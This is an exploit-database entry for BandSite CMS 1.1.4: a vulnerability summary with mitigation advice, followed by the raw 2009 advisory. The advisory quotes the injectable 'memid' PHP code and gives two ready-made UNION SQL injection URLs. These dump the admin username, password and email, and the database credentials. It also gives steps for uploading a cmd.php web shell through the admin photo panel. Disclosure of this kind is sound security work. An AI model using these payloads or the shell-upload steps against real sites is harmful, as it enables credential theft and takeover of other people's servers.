header-logo
Suggest Exploit
vendor:
BandSite CMS
by:
SirGod
7.5
CVSS
HIGH
SQL Injection, File Upload
CWE
Product Name: BandSite CMS
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: NO
Related CWE:
CPE: a:bandsite_cms:bandsite_cms:1.1.4
Metasploit:
Other Scripts:
Platforms Tested:
2009

BandSite CMS 1.1.4 (SQL/Upload Shell) Multiple Remote Vulnerabilities

The BandSite CMS 1.1.4 is vulnerable to SQL Injection attacks in the member_content.php file. An attacker can manipulate the 'memid' parameter to execute arbitrary SQL queries. Additionally, the CMS allows an authenticated administrator to upload malicious files, which can be used to gain unauthorized access to the system.

Mitigation:

Apply a patch or update to a newer version of the CMS. Ensure user input is properly sanitized and validated before using it in SQL queries. Limit file upload capabilities to trusted users only. Regularly monitor and review system logs for any suspicious activity.
Source

Exploit-DB raw data:

#########################################################################
[+] BandSite CMS 1.1.4 (SQL/Upload Shell) Multiple Remote Vulnerabilites
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
#########################################################################

[+] Remote SQL Injection

 - The script is full of SQLI bugs.This is one of them.

 - Vulnerable code in includes\content\member_content.php

-----------------------------------------------------------------------------------------------------------------------------------
	$memid = $_REQUEST['memid'];
	
	// define the query
	// if the $memid variable is set, that means we're displaying a full bio and we should select the specific member entry
	if(isset($memid)){
		$query = "
			SELECT
				*
			FROM
				memberbios
			WHERE
				rec_id=$memid";
	}
-----------------------------------------------------------------------------------------------------------------------------------


  PoC 1 :

    http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,admin_username,admin_password,admin_email),4,5,6,7 from config--

  PoC 2 :

    http://127.0.0.1/members.php?memid=1 union all select 1,2,concat_ws(0x3a,db_username,db_password,db_name,db_host),4,5,6,7 from config--


[+] Upload Shell

 - Need to be logged in as administrator.

 Go to :

    http://127.0.0.1/adminpanel/index.php?action=addphotos

 Add the shell :

    cmd.php

 You will find your shell here :

    http://127.0.0.1/images/gallery/cmd.php

#########################################################################

# milw0rm.com [2009-03-30]